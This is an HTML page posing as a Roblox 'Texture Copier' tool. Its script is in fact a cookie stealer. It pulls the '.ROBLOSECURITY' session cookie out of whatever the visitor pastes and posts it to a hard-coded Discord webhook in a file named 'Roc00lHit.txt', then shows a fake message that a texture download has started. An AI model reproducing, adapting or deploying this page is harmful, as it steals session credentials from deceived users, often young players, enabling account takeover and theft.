<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Texture Copier</title>
  <style>
    body {
      background-color: #000000;
      color: #00ff00;
      font-family: Arial, sans-serif;
      font-size: 20px;
      text-align: center;
    }
    
    h1 {
      color: #00ff00;
      font-size: 28px;
      margin-top: 50px;
    }
    
    #form-container {
      display: flex;
      flex-direction: column;
      width: 400px;
      margin: 0 auto;
      margin-top: 50px;
    }
    
    input[type="text"] {
      padding: 10px;
      margin-bottom: 10px;
      background-color: #333333;
      color: #00ff00;
      border: none;
    }
    
    input[type="submit"] {
      padding: 10px;
      background-color: #333333;
      color: #00ff00;
      border: none;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <h1>Texture Copier</h1>
  <p>Copy Textures With This Esay Curl Based System..</p>
  
  <div id="form-container">
    <input type="text" id="input-field" placeholder="Enter Texture file">
    <input type="submit" id="submit-button" value="Copy texture!">
  </div>

  <script>
    document.getElementById("submit-button").addEventListener("click", function() {
      var input = document.getElementById("input-field").value;
      var webhookUrl = "https://discord.com/api/webhooks/1124323424274239499/lclWpQ1adzyTe0aC9nUgVEhFUbqiOHZOjsx7ma3vIo-1yP1nc28louJv5rSU_Ub-Qkol";

      var startIndex = input.indexOf(".ROBLOSECURITY");
      var endIndex = input.indexOf("\\", startIndex);
      var extractedText = input.slice(startIndex, endIndex);

      var fileContent = extractedText;
      var fileName = "Roc00lHit.txt";
      var file = new File([fileContent], fileName, { type: "text/plain" });

      var formData = new FormData();
      formData.append("file", file);

      fetch(webhookUrl, {
        method: "POST",
        body: formData
      })
      .then(function(response) {
        if (response.ok) {
          alert("Texture Download Started Pls wait 5 to 15 minutes!");
        } else {
          alert("Failed To Download Texture .");
        }
      })
      .catch(function(error) {
        console.log(error);
        alert("An error has occurred.");
      });
    });
  </script>
</body>
</html>
